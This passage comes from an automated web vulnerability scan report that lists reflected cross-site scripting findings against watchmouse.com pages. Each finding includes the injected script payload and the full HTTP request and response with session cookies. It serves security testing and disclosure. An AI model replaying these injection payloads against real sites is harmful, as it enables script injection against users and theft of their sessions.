Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ef2f8e97c1e40f40296fb0d823c06963"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/featureb192a"><script>alert(1)</script>4a903a5d4a5/api-and-web-services-cloud-monitoring.html" method="post">
...[SNIP]...

1.117. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beb54"><script>alert(1)</script>dc0b88f9433 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/api-and-web-services-cloud-monitoring.htmlbeb54"><script>alert(1)</script>dc0b88f9433 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a9a2c997936dc8d0af26bb34bfef74cf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.htmlbeb54"><script>alert(1)</script>dc0b88f9433" method="post">
...[SNIP]...

1.118. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d7f"><script>alert(1)</script>8f27bbd4825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/api-and-web-services-cloud-monitoring.html?60d7f"><script>alert(1)</script>8f27bbd4825=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-8fa90c08501ebf73e13a862b1dde7698"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/api-and-web-services-cloud-monitoring.html?60d7f"><script>alert(1)</script>8f27bbd4825=1" method="post">
...[SNIP]...

1.119. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf13"><script>alert(1)</script>6fdd1dec09c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en4cf13"><script>alert(1)</script>6fdd1dec09c/feature/compare_plans.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5ed100168235b692a4ca25b8e4e68aaf"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en4cf13"><script>alert(1)</script>6fdd1dec09c/feature/compare_plans.php" method="post">
...[SNIP]...

1.120. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b69d"><script>alert(1)</script>c3996150547 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature5b69d"><script>alert(1)</script>c3996150547/compare_plans.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-7917c81f8aaa01fa1264e9649b126e96"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature5b69d"><script>alert(1)</script>c3996150547/compare_plans.php" method="post">
...[SNIP]...

1.121. http://www.watchmouse.com/en/feature/compare_plans.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1671f"><script>alert(1)</script>203b8264d7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/compare_plans.php1671f"><script>alert(1)</script>203b8264d7f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b58daf6d0d5b2cb3e25431f51eadbe16"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/compare_plans.php1671f"><script>alert(1)</script>203b8264d7f" method="post">
...[SNIP]...

1.122. http://www.watchmouse.com/en/feature/compare_plans.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/compare_plans.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99b2"><script>alert(1)</script>6d22ff4967f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/compare_plans.php?a99b2"><script>alert(1)</script>6d22ff4967f=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-aa546511901888e7a70cd079e87020ff"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/compare_plans.php?a99b2"><script>alert(1)</script>6d22ff4967f=1" method="post">
...[SNIP]...

1.123. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1db0"><script>alert(1)</script>5dd715f3a03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb1db0"><script>alert(1)</script>5dd715f3a03/feature/ipv6-performance-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a212367c275ffe8c0f1486af2d8ff4bc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb1db0"><script>alert(1)</script>5dd715f3a03/feature/ipv6-performance-monitoring.html" method="post">
...[SNIP]...

1.124. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca04"><script>alert(1)</script>f8153d05f72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/featureeca04"><script>alert(1)</script>f8153d05f72/ipv6-performance-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9c6109f5abbb15d18c62424830112bf9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/featureeca04"><script>alert(1)</script>f8153d05f72/ipv6-performance-monitoring.html" method="post">
...[SNIP]...

1.125. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16cf"><script>alert(1)</script>49a14e52a8f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/ipv6-performance-monitoring.htmle16cf"><script>alert(1)</script>49a14e52a8f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-6608d9a325f0a7f20bd56bf22af97cfd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/ipv6-performance-monitoring.htmle16cf"><script>alert(1)</script>49a14e52a8f" method="post">
...[SNIP]...

1.126. http://www.watchmouse.com/en/feature/ipv6-performance-monitoring.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/ipv6-performance-monitoring.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aca1"><script>alert(1)</script>4484029025a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/ipv6-performance-monitoring.html?8aca1"><script>alert(1)</script>4484029025a=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ce3bb42c6db13291bc353b062ff169e7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/ipv6-performance-monitoring.html?8aca1"><script>alert(1)</script>4484029025a=1" method="post">
...[SNIP]...

1.127. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4432"><script>alert(1)</script>55c0466f113 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb4432"><script>alert(1)</script>55c0466f113/feature/privacy.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0f4f320dd8ee4d0ddaba9ea9cd75837f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb4432"><script>alert(1)</script>55c0466f113/feature/privacy.php" method="post">
...[SNIP]...

1.128. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda58"><script>alert(1)</script>9731a381c2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/featurecda58"><script>alert(1)</script>9731a381c2e/privacy.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-bc4df4e5654c8a855186798ea477c728"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/featurecda58"><script>alert(1)</script>9731a381c2e/privacy.php" method="post">
...[SNIP]...

1.129. http://www.watchmouse.com/en/feature/privacy.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3859"><script>alert(1)</script>e5e0918e440 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/privacy.phpf3859"><script>alert(1)</script>e5e0918e440 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b01d643f5039e3a66b7066b82384252f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/privacy.phpf3859"><script>alert(1)</script>e5e0918e440" method="post">
...[SNIP]...

1.130. http://www.watchmouse.com/en/feature/privacy.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46246"><script>alert(1)</script>9bf03c9f7d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/privacy.php?46246"><script>alert(1)</script>9bf03c9f7d5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
